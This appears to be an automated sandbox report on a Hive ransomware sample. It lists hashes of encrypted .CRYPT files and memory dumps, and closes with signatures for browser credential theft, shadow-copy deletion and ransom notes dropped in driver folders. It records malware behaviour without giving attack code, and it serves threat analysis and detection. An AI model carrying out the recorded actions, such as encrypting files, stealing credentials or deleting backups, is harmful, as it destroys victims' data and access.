SHA512	709deed649d6062cf8c1ada7207b9c871d51a69a4bc7dc3c1408bd6a38d211ff53ce19a091cc4bb68a62eb00aa512afd07a33d314393812716391f04faea93d3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js

MD5	ac24e253ff384d8523af43f5a93688f7
SHA1	beb4ffa972185300803e9a1f6a16ec062cec1015
SHA256	f49327d72a4888fee8721962d13a94571e349ba666a0e1354c4f49331e858cff
SHA512	9c559a1bdaae9172fbe9e6a9b907390041fd16d0382a202423e0d9d19bb0f2c06a7228d6bc17df943d4e927c0420f302982e0463755bfd5c0d6e4ecb65504a61

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js

MD5	cb05ff26ffcb30838de16f659f8d93c9
SHA1	f9e977e1f60be49be8a17cf75d31f4a7620827ab
SHA256	ef97178fce43f78773e1c57cebaadd55904a1e5d810f8f75219b23e92c00687d
SHA512	26fc3838e5ef5b638d974be02b6d8f76f7f4778b1b612ea9031c5a5b1cf4a421e48c7a667a1f8db55270c1c86c4e1ec469c8078dd0edaeec2df02fddff27a999

C:\ProgramData\Microsoft\Windows\Caches\{06341C50-7ABC-4353-A54D-B7B639697520}.2.ver0x0000000000000001.db

MD5	8b836d8d3ea988668ddae3311f514a57
SHA1	af3199496b831b74bde630f871615ce5848f9857
SHA256	ac944397bb7351bf439ea8b7e6cf5863fed078383f3da0b7c92b53408fe680d5
SHA512	f205183db25237a58c6a33b9c83af86df3210fc7cc411d4638af9c856fb39a2795c99d612601bdf183101402ed6455b7949a9deabfb2b2262afe47dff0c17cc2

C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\8cfc804a-d777-2361-1670-4569e516397e.xml

MD5	29eb0301f92bda0d67f79582acadf847
SHA1	2c2ac90238793f699322833c2f8bd043cc29ddec
SHA256	221ce3a8c269f4dff433a9a8a9807f65d8fa7b302e640b245f7293a0998363d6
SHA512	61f47426e5dff09a432a7848f3d07cfb5f85cab6b327fb416c31223e6a5ecaaf3a3f065a6c4bf0a352fb4fd3c7199ae481c929c43da3d596000f87d7f6bd52c1

C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\8e383e90-b2f9-7bf2-1d5b-4e47dcb2014e.xml

MD5	31434364acba2fa351fc9715db743df4
SHA1	1c2e77b236cfdd14960e90c9a48e59532d1a255b
SHA256	a94fc52f4840aa6390d47765d3fce16ab6d1c1978441156ef607a4b6f63fc317
SHA512	b069a65226c5aea8d50da2a179a351051a6680cf42a117d5d5b98e97bdcdd12e412f698b89039bd3464550e5794d3b95d97c6ee6931dc72e1bb060daa08e40b4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png

MD5	d47b127bc2de2d687ddc82dac354c415
SHA1	746c3f4d286c531e065e8af76e0ac0868831c6b4
SHA256	6ab72eeb9e77b07540897e0c8d6d23ec8eef0f8c3a47e1b3f4e93443d9536bed
SHA512	6ceec4ab9b9b8a5839e6650648089e263b6645d4be3e1912bf867c0e3e174f976a39f5446c4bd1d57d837d6319b123103fe2fee2f590380a83fe4d0ed98099ef

C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini

MD5	ace3165e852adb8aedbeda2aa3be570b
SHA1	4577ff7e92850e2723008f6c269129bd06d017ea
SHA256	237f73d46d3501de63eae1f85fdf37e65ddced70f013b7f178d1ee52b08f051f
SHA512	cf77563b9295b191ce2f309e03618d1ab4d317f65b87dbecc4904ee2d058db06d23c20c199571b0fafb67ae5ec5166b76af0b7d8bfe3996b0dde9751e28f8c03

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db

MD5	c7c6abfa9cb508f7fc178d4045313a94
SHA1	4f130f23896bd6d0e95f2a42b2cb83d17ac8f1a2
SHA256	1bda9f0aed80857d43c9329457f28b1ca29f736a0c539901e1ba16a909eb07b4
SHA512	9f1c1e438b8cceda02663a61a64c1c5fc6fb6238aa92d30e6d8d1a7b0cb29a8a6f26b63b9964ad876617f71ee7dc3c05205158c4ed4be327149652b1c6900825

C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.3.db

MD5	4534f12102d235344cf8dda748f0cabf
SHA1	7db67baceeecb3a420bf37a7beca4a45185f8f3c
SHA256	1bd4db450abc8914c2fac721cace2704ff4c16028e6d07293154dad289835694
SHA512	7b4dacdbc6a2fccdd3818eb41b7fa23eeec51f333af0e842d9185c7ae45eba1623369b1caa27b824cba10c4cd6a2cdbf7f127ab2c6f7656eedce5fe25a0b84a2

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5	d62de45260290993ab8f379c928263eb
SHA1	1a885ddfea2427607247084565bf7b547005b7cc
SHA256	5443a81a010bc1ff7da14947d3737287a2045bac55e5a7057ce5d17171989c58
SHA512	66228c968e4691940ec8e3265de44ca328e7787dcd04fd4a6a0142a63164f70aaada515221e2a9654d7790e90ed1b73cf63024f65c72b3313b05c82c3ee67ec3

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db

MD5	e6065c4aa2ab1603008fc18410f579d4
SHA1	9a7dcfd9029de86dc088ee6ebbef48df90e7c6cd
SHA256	4e29ad18ab9f42d7c233500771a39d7c852b200baf328fd00fbbe3fecea1eb56
SHA512	1339d6533a0b875db3f1f607290f8de0e8f79172390faa03fe1ae15cb738b9c64828b08ed11721acc2909cc9394cc9cc115c9d7c9895cefa76f5146614961277

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6f8c21e8-1266-470b-aa9c-23edd8fd2427}\0.1.filtertrie.intermediate.txt

MD5	f6a6263167c92de8644ac998b3c4e4d1
SHA1	c1fe3a7b487f66a6ac8c7e4794bc55c31b0ef403
SHA256	11770b3ea657fe68cba19675143e4715c8de9d763d3c21a85af6b7513d43997d
SHA512	232d43e52834558e9457b0901ee65c86196bf8777c8ff4fc61fdd5e69fd1d24f964fed1bf481b6ef52a69d17372554fecb098fb07f839e64916bdd0d2abf018a

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db

MD5	0d2f25297cc2269b6809187457de19c2
SHA1	d388776eab9c044341b50a1eb82f5231489b246a
SHA256	88786b96909d1a88ec0c5aa8949c1b3bfd3643cbc3a9e175c1cb76f1ad37cb82
SHA512	1b5935e649902370efd7919eff5d0ba4223a9fddcece85f57b1b3a2cd0b639a132d55e0d89e0b027c1c6cb0eb1cfccfa26f943956ea1d06f2b88f3b8ab9a27cd

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5	3eb7c282d0e4a6d6d6c6c1eb330e6703
SHA1	df7affa6a47a504d140f5513ce232af2b71df098
SHA256	2d0906036802971a88d8e7074ac32c8ebd673c566197e41e713841e18e56ac4d
SHA512	82c994ff4f5ad27ecfd85a56ed88669284becab2e45ee138af9fcf3341a2499fb9ebe059934ccf4edde313969900446e130cd2f706cb38d7e68ae5a83405564f

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5	77b65a77cac00fe47b16dd4819c4a4c7
SHA1	5d174cc05cfc487ee35db8aaa770930a26529bc0
SHA256	31aa3f7fa15dc18c49e4e36554fbaed761808284a0fa4a792a48e46d267e0383
SHA512	abcc320916161427a5b5683edd9242ad065680eee55f35b770e24c58f3ddb5b77bc1f58bc4c5fb851bec15b441a8de904a10dbb7eeaf6dcdf9460470d3d33d78

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db

MD5	777dd969da3dd17026244668b774e058
SHA1	e0a066d28dfc6bcca1c13a50bfc4b35a37541b7a
SHA256	221f1bd7bad281fe93374736df606e52ce7393ae4fe0bdd4682935b90f184e59
SHA512	1f1a19b1a969a62cd8c83622e89077492457dd00f28505f0fe49a600688b18bf0407cae61e0da9f0d23fd0f6d874125fe83a5666ca7975976d612743fda08158

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db

MD5	ae6fbded57f9f7d048b95468ddee47ca
SHA1	c4473ea845be2fb5d28a61efd72f19d74d5fc82e
SHA256	d3c9d1ff7b54b653c6a1125cac49f52070338a2dd271817bba8853e99c0f33a9
SHA512	f119d5ad9162f0f5d376e03a9ea15e30658780e18dd86e81812dda8ddf59addd1daa0706b2f5486df8f17429c2c60aa05d4f041a2082fd2ec6ea8cc9469fade3

C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{03BA58C4-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.CRYPT

MD5	741504733cb68b875aa72ec5d0627635
SHA1	b8741f20aab40cd60266c41c4e81fc6fd31630c9
SHA256	50abe2f6ca20d4429481d24e92525ce6c7ded0c6d2ff863db3aa7fbfa6b6650c
SHA512	565f38a5075f568c967b44d0f37c2700bdb857834a29bd37f3690ea8f006272d92525e7dd1e071688281b18c5c080a02eca72286bcefde0734320020397edc62

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

MD5	3c30aab2bb30558495718034ef68f870
SHA1	f2a261989b9d8feab45b290d111a24b5c59225db
SHA256	d61f6b67da4d94d5d85dace4de2b41fb9a9e7c0d3d4131bad2b769cdd3788d1e
SHA512	6062a61fe885a397678180e71e434e8c06cd35d5f69f76054621d7f68d89036f91263e602eb76eb1ce9c43f97bc4e4c1e1d68e4beba23fadaf95b5b7613ee161

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5	4708158baf53cc8c8fd3cfdecb49977f
SHA1	2f266dbea68d3163d90df9925992b7064aefc312
SHA256	23914ffc26a90101d879bedb4ad1bc320d3459b923b6a464f2d89a7efe0d93cd
SHA512	6cead375cc42d8db877d697aaa472a7d283cf3e2ea61e87e17ea7804ea55e49eb2ed23fdcffca17db3ab2ffd4aa36706fe8a068a48d1812bf04de2e8bd9e28d1

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db

MD5	382eb55a81964f39214279e544e145ae
SHA1	11f3b41f6dd4a6eda6078b89e22b7c3ef818cb90
SHA256	5db0fdffa49651e306f20351ab01e87fab4211d3d5d514eb737ca8f42ab160e2
SHA512	ee93f169c72be31907bb7d50e7f6fd22e83c7f7f091498d19afcc23ec813b7eaa835f6c01e7a83e8e271bdde05878d098970b479b580fa85d62be296ea8e348b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5	c1629d23ffbef716b620cdcd3008a801
SHA1	8d9776f44eb65cd24bb07c78d685f4b9bb099f68
SHA256	54afb4b1d190caddb313d4a172d02f4ff9a5a2caeb5806183a01bb281031ee80
SHA512	bc5ef7b414c1a61e5e9686e6cd141c3b41a99e0db7e37a1aa9ac98b74a3e26bedbef403e1c564ca7a57bd5e42ccca75b3f2c5ca2641d87bdb61848d95ec3a676

C:\USERS\ADMIN\DESKTOP\SHOWMEASURE.DOCX.CRYPT

MD5	682f9daa47699bb818b7ece4d8cae4fd
SHA1	3db0947e797dda8470725c8d2514e8a1f9893da0
SHA256	ebe0eb033230f75b0c720b2d9cfb8a17587180ff20cdef7173b021670e3b51a1
SHA512	e6708159eae6049508aa6ae683bda398fca799e97aae76f77bcf2b0d9bf9f8c248ca6324fe0ac5315627f7fbe3daec6ea58867f2af8df1da1cf61fd30b234619

C:\USERS\ADMIN\DESKTOP\REGISTEREXPORT.JS.CRYPT

MD5	317e74071329753ac00b64424ab3a04e
SHA1	640873c2f3cbb297c76ae26af632e6de4776302d
SHA256	5380ee2f5d41e592007856fbd92bb82e5563de9bdbcc61fe44d39c83c5403984
SHA512	929208c89022dea540859fd7d71a70af310e13144572d4ff6d2071cda18127244352f1f584a9b0a2e159a90f14925a61f22fc1d0aef68bcd7810960d8764ef3d

C:\USERS\ADMIN\DESKTOP\READHIDE.DOCX.CRYPT

MD5	776162c333b112b29b1da0448b7ab15d
SHA1	9abe37cfce6bd1091f3685faf36201414572bce5
SHA256	ecc2f5176160ef14d2dd5f19c145344184672a7a85cf27e8efb7afe3d82ea9a9
SHA512	54be488c39e48c3e4fd94865c4765c6dbdb9ee4c65a59fac907f357256d21bc054649c593f9ee853ab09cfac576351006f89e02518dcc6fb4a79f1eb93900253

C:\USERS\ADMIN\DESKTOP\PUBLISHGET.WPS.CRYPT

MD5	b8bd52253067f71e0e1b42f060380233
SHA1	3a7fed2700d855969e730272bcf8a082ef63395d
SHA256	edcbb01079cf44cc775f8cf70a078a19445b0e0a2b76ecae7e9f0d0f14cedec9
SHA512	2f24708fa262e8b591598ee4d524096e4cfe4246c571d1eef61c8952c085f0fa62b7a994cd4a786e150143c44797f2e0944cb1599a6f7ca411002bc9a3869089

C:\USERS\ADMIN\DESKTOP\NEWREVOKE.XLSX.CRYPT

MD5	07189b88ce47b0a27bf30d8e914f2fab
SHA1	22f41d4c150f640145484d50e312a895da77ed3e
SHA256	69b1efd779d2865db6251270f5c75ae074bd380ada40797badaae53777c92a19
SHA512	1230623f80812d8485178a804db54d1f41a1fa24e06bbf3a13e3c803f859d36f02bf544c0623d3810718e12f764e967b2d7d2945a6e99063d8617b604b06e2ca

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db

MD5	b4c70949a62a7356119b5fb8b43c44d7
SHA1	1d36d1023cdb15948211d105c5f74a519f502598
SHA256	079f87216895f0459e196a1c06885803befec97f6460d0797317897a41ca1514
SHA512	39cd64ca7d6b6c2b9de7549d8c32e63842f96da73a39b3bb429b6314dc398069a5dc72cc9e42658aa4723b5cfbc691cbb218b698a05644f702e0dec2b2fba22e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db

MD5	7ed46e1dbf6b169ecf4f7911303c1f51
SHA1	49c8458155776459c110d5729d14793378dab1ca
SHA256	a737f6e2c3edbd10d4cc6b35a741216db5736552dd1ea31fe5c02b3319e1aaf7
SHA512	8aa8e823aa8a9ba4b90bbcf8fb836fd2c1f7aaac35a6232ec93db175395457d09d016a6b362d8a8a59929b5518bfd714382520e6ae9b81b9b2217bee4c33521a

C:\USERS\ADMIN\DESKTOP\MEASUREREVOKE.CSV.CRYPT

MD5	3a97815c55d6047ae2bdc5d8a801c1ce
SHA1	43c32427e15786938bf1f0b48e417caf52cc796a
SHA256	88b0a3fe88d9ddcb1dd5d5ee3c7ece7a42f8154ae4c16e5c98b6ba2444fc77f4
SHA512	4e9994a3cfb946a0f00ac7ee689e77fa6b44a18c6f4b940f752f5040f0e73e38cb8abac8b04dd14de28f693333e6e4465cac68ec98280087650341baa051478a

C:\USERS\ADMIN\DESKTOP\FINDUNREGISTER.HTM.CRYPT

MD5	f20fa0090d67bf7115a2b12ca1e1d630
SHA1	415f1cec7c8bee0c259df1cd4dfd4235b18ba3ca
SHA256	0495ea44c4eabdbd2b233bece767e66c377e26c6cc1a52a40a8c61567b420fff
SHA512	0448869859b6bbf1594da7d1e3a21f4f6fc8529cae87235d4e3013126a83f5abfbf0bb9c779d2f33e322d7bcf0e6ba597a65f8c4958e4a4db2fa6a48c87d2037

C:\USERS\ADMIN\DESKTOP\DESKTOP.INI.CRYPT

MD5	c7d97d7df31fe009e3f88c5df22e190d
SHA1	18b933ca384b63b0cf36325eafb7194b14c21cdc
SHA256	61b4385d49c05c0cd5fc8c0d41cad694516e27604d32a2aab964ef185779f821
SHA512	ced3e6151f719fcc365cd5660ae8ec1c2d036c275e19178301271eb0745524632533319e37c18a103a32b0a446bfea2fa15a131a192259ee4c8dc0b515d26d89

C:\USERS\ADMIN\DESKTOP\DENYUNDO.INI.CRYPT

MD5	ebbdeeba12ac5627c39d5554956f61a1
SHA1	db3dba1b1565bd9b7ae4c96bf551f58f3d118f9e
SHA256	d697fe898717bf177172f66e3d4ebc51be5d53bc120d0b2fb8273e2d49824b83
SHA512	48eb22bd84436bc1d56b2d9407fb1c55d0a3a06ce197e0e54e8a437687bb60757ea947edea9d07090630feb8321ec5275e409640a719f29b16d87c72551cc419

C:\USERS\ADMIN\DESKTOP\CLOSERESTART.DOCX.CRYPT

MD5	3cde3bac81ebbf94a2c91f15373382f1
SHA1	ff38e60f71c20bb6f46b90a9841510c7e3fe432b
SHA256	25fea8c3d1a23b7d2829c56fcf109443c30e9846ce86e563a959c76df39a1671
SHA512	a1541d98dbddfe7921d086c6fadfc243f25b9525a7dda61c5b9572cfc5c053879e9891790acade710f0f992819c30a7bb936deed1c0b1d98d35d24ffaaffd64f

C:\USERS\ADMIN\DESKTOP\BACKUPCONNECT.HTML.CRYPT

MD5	cd1e8c41c0b154b633c67945a9ed55df
SHA1	6fbe866eb5961ae8a8b19908f6698925680d0f94
SHA256	6604aebe28d97caec7b589be926f2286e4f7eef73169a96d9aabe17e5fd6bcae
SHA512	ef405a773c3cf8f4a3b95c2ba7e5d9f0d561286a6f4a583f47c4b6d47a665eaef2b21a264dc0e86741906334ed6e40369301f5ca899b53ce04c054966dc5524f

C:\USERS\ADMIN\DESKTOP\ADDRESTART.PPS.CRYPT

MD5	50f44b4a65455d9a76e97ff26b01c1c1
SHA1	333e5d952096e40ed05a9f560ddd0446f667cc4b
SHA256	fa786a6a556a52be57fd70c3c377cf4be294c8124bd14abc90f9ad56a3bab9e3
SHA512	8ea0e23aff236f5aa2c092d6a61881f410b59e82b3c6f8ad03ebf4833e7caaf184b3ca3b298bea36811ac6854143d8d5b733c230a872fb88ffd0617c895faa03

C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI.CRYPT

MD5	ed50a3740efb5788147ac732cd46e73f
SHA1	49f543bf3e47564eaa3c14d2137f72b80a684be1
SHA256	7a180ada88c8903078fb5332294e9f44975e89349cc99a1de6b8cc8e9b1a3832
SHA512	f8e886fa74d4f49942935b775c23401a027b307712bf89cddbc916c36f87e9a23b10648bb50ab2c188da20351fa0fd8551435ba809269819508e26bd4d3ed668

C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.bin

MD5	2350b47261040b1ee32f7df427ab30fc
SHA1	e656cced405e01b6a60b7444b2c9e1b31ed7c63a
SHA256	612881f476b4820221970c20f44ee5d9cd9c64a2cd3c9ec82e6757209c0184db
SHA512	a9e5838e63c2f786d57fd3e808ed54c6af0f7fc60dcc9cc1d606309d976c1b8954ef6271838db3e20325a6d66889362e3f28825a6fdba5075b860efc43d1d941

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db

MD5	fa81b2d92a9a1e2a097836e9f9538847
SHA1	9db5ddede06dd505dc65d7714d65fdf3490ec6d7
SHA256	f1bb4b9a6febb67ec216afc1ac4af6812096ce832d874b71d23e64e24be12153
SHA512	cfc92b130585cedbd241432b2f0bf2d884cfe18be47df6c49bfb987b5c8d847d1c378df1f822d212b1f3c4401ce53f0f8d6dae4478e2e8bc7bab40d508608225

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin

MD5	0f7dff66a128cced04327977bc7b5e7a
SHA1	d7b4ec941cfc3dec39525b047ca8f02e12061192
SHA256	da07d7603eadcd9d567889527fd3548990260ce623b891acb527486f234807d1
SHA512	45a88d12fedd37014eca03ddf5628fa7c4509270098f2c08412825ac50aeeab37bde8608b8a76a7f8504e6d6b3ad87b676ae69bdffa491620e7d2f2210ff50ae

memory/4040-22264-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

memory/3972-22271-0x000001CFD5E00000-0x000001CFD5F00000-memory.dmp

memory/3972-22269-0x000001CFD5E00000-0x000001CFD5F00000-memory.dmp

memory/3972-22274-0x000001CFD6E20000-0x000001CFD6E40000-memory.dmp

memory/3972-22307-0x000001CFD69E0000-0x000001CFD6A00000-memory.dmp

memory/3972-22308-0x000001CFD7170000-0x000001CFD7190000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\76SX1MLC\microsoft.windows[1].xml

MD5	590d8314f03d3a14c1ea34dfbd0a32b3
SHA1	ef1bdbc9511c1148d218ce77cda9c1b825e8e35f
SHA256	9053535f2c36919721f340cceaa5232bf2666fe4b022a197079d4fa708913acc
SHA512	85bfce822d52aee0edf432a96bad304f4e7fbfd92c7d74be9cf8ca5708c1f1e569d3e192e2c6e6d9c4ab4ef706cc14c05f619b4613cb0ddcfcc4920bac89ceb9

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5	cb1f0c7cd627dac6e1aeeeaa2e9d797e
SHA1	ecaffa6a692e92f9c62ae24ffba283e3889b490a
SHA256	3fde4c8669d4d51d1a265161ee912c4ee537875fef98b47942500ef12313dd96
SHA512	cdc1e244e49ae517a3f7748c05d5c09afe194811c989f8e530ac4e61bb3fffeec8591bb4f8eb9fa839277c4dcc540848017e92895d65a447bc539773afe6e49d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133666585176242334.txt

MD5	ecaea544af9da1114077b951d8cb520d
SHA1	5820b2d71e7b2543cf1804eb91716c4e9f732fde
SHA256	9117b26ab2c8fdbb8223fe1f2d1770c50a6cf0d9849a5849d6aebcbe90435be6
SHA512	dc7bedbc581818011aa2d313429f234b12e5e9cf320b02b8d7ceeaf9cdc1c921ffc51af7f4080b02740f2d2146fbb006ccbf37cdcba3e3a10009142daffdb919

memory/3888-22446-0x0000000002130000-0x0000000002131000-memory.dmp

F:\$RECYCLE.BIN\S-1-5-21-1750093773-264148664-1320403265-1000\desktop.ini

MD5	a526b9e7c716b3489d8cc062fbce4005
SHA1	2df502a944ff721241be20a9e449d2acd07e0312
SHA256	e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512	d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini

MD5	e0fd7e6b4853592ac9ac73df9d83783f
SHA1	2834e77dfa1269ddad948b87d88887e84179594a
SHA256	feea416e5e5c8aa81416b81fb25132d1c18b010b02663a253338dbdfb066e122
SHA512	289de77ffbe328388ad080129b7460712985d42076e78a3a545124881c30f564c5ef8fb4024d98903d88a6a187c60431a600f6ecbbe2888ee69e40a67ce77b55

memory/4596-22451-0x0000020AF8B50000-0x0000020AF8C50000-memory.dmp

memory/4596-22452-0x0000020AF8B50000-0x0000020AF8C50000-memory.dmp

memory/4596-22450-0x0000020AF8B50000-0x0000020AF8C50000-memory.dmp

memory/4596-22455-0x0000020AF9970000-0x0000020AF9990000-memory.dmp

memory/4596-22473-0x0000020AF9930000-0x0000020AF9950000-memory.dmp

memory/4596-22487-0x0000020AF9F40000-0x0000020AF9F60000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

MD5	c44f12692cc165e5102eae4a69a51c20
SHA1	11284413f6652dd26d4c584574da1d6774d48ae3
SHA256	930bb47469e49bd56bb9efa6530d5047c9c3b4a34ac708f820a31ad2748c9907
SHA512	6569a528129d10f2dae6e14380e0899a19eec6853789c82bf3465ea7bdfca62f71ae86e738772ed198782b2ee54847ab668b428ee5652b8ede29f88a9bf8396d

memory/5004-22598-0x0000000004030000-0x0000000004031000-memory.dmp

memory/1656-22605-0x000001E4F47D0000-0x000001E4F47F0000-memory.dmp

memory/1656-22618-0x000001E4F4790000-0x000001E4F47B0000-memory.dmp

memory/1656-22631-0x000001E4F4BA0000-0x000001E4F4BC0000-memory.dmp

memory/756-22743-0x00000000046E0000-0x00000000046E1000-memory.dmp

memory/5012-22747-0x000001E851B00000-0x000001E851C00000-memory.dmp

memory/5012-22751-0x000001E852A80000-0x000001E852AA0000-memory.dmp

memory/5012-22774-0x000001E852E50000-0x000001E852E70000-memory.dmp

memory/5012-22760-0x000001E852A40000-0x000001E852A60000-memory.dmp

memory/5012-22746-0x000001E851B00000-0x000001E851C00000-memory.dmp

memory/3984-22888-0x00000000014A0000-0x00000000014A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{CF713EE3-0BF9-4647-9E70-B359D72C9520}.png

MD5	00e5fcfd833151f7cbde607e2f7afeb4
SHA1	55839875c0947aafebff53d22ccc5dad29fe3563
SHA256	b80192aaabe007baecd0603e3ce183e9d554b8a6b0411d20716acfa086ae3035
SHA512	f056777a1987c3becdc217bdc2d82e6aa41086d38fddaa45c42f1726b6f7b7616a10918081650e825a724464ef148b669bc258d38a62e0de8642e2607a0b0de7

memory/4416-22891-0x0000015166700000-0x0000015166800000-memory.dmp

memory/4416-22897-0x00000151676B0000-0x00000151676D0000-memory.dmp

memory/4416-22927-0x0000015167A80000-0x0000015167AA0000-memory.dmp

memory/4416-22913-0x0000015167670000-0x0000015167690000-memory.dmp

memory/4164-23030-0x0000000004B90000-0x0000000004B91000-memory.dmp

memory/1444-23038-0x000002017FB80000-0x000002017FBA0000-memory.dmp

memory/1444-23057-0x000002017FB40000-0x000002017FB60000-memory.dmp

memory/1444-23059-0x000002017FF50000-0x000002017FF70000-memory.dmp

memory/4732-23166-0x0000000004DB0000-0x0000000004DB1000-memory.dmp

memory/3568-23169-0x000001D45CC00000-0x000001D45CD00000-memory.dmp

memory/3568-23175-0x000001D45DC00000-0x000001D45DC20000-memory.dmp

memory/3568-23198-0x000001D45DFC0000-0x000001D45DFE0000-memory.dmp

memory/3568-23187-0x000001D45D9B0000-0x000001D45D9D0000-memory.dmp

memory/4920-23316-0x00000000041F0000-0x00000000041F1000-memory.dmp

memory/3580-23317-0x000001C292500000-0x000001C292600000-memory.dmp

memory/3580-23319-0x000001C292500000-0x000001C292600000-memory.dmp

memory/3580-23322-0x000001C293460000-0x000001C293480000-memory.dmp

memory/3580-23334-0x000001C293420000-0x000001C293440000-memory.dmp

memory/3580-23351-0x000001C293820000-0x000001C293840000-memory.dmp

memory/3580-23318-0x000001C292500000-0x000001C292600000-memory.dmp

memory/4496-23461-0x0000000003F60000-0x0000000003F61000-memory.dmp

memory/1348-23464-0x0000021B51C00000-0x0000021B51D00000-memory.dmp

memory/1348-23469-0x0000021B52B60000-0x0000021B52B80000-memory.dmp

memory/1348-23495-0x0000021B52F20000-0x0000021B52F40000-memory.dmp

memory/1348-23484-0x0000021B52B20000-0x0000021B52B40000-memory.dmp

memory/572-23604-0x00000000040D0000-0x00000000040D1000-memory.dmp

memory/400-23612-0x000001E013600000-0x000001E013620000-memory.dmp

memory/400-23627-0x000001E0133C0000-0x000001E0133E0000-memory.dmp

memory/400-23637-0x000001E0139D0000-0x000001E0139F0000-memory.dmp

memory/1548-23745-0x0000000004290000-0x0000000004291000-memory.dmp

memory/3200-23753-0x0000019DECD70000-0x0000019DECD90000-memory.dmp

memory/3200-23774-0x0000019DECD30000-0x0000019DECD50000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240704-en

Max time kernel

143s

Max time network

21s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

Signatures

Detects Go variant of Hive Ransomware

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Hive

ransomware hive

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Deletes shadow copies

ransomware defense_evasion impact execution

Drops file in Drivers directory

Description	Indicator	Process	Target
File created	C:\Windows\SysWOW64\drivers\UMDF\es-ES\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\UMDF\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\UMDF\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\UMDF\fr-FR\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\UMDF\it-IT\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
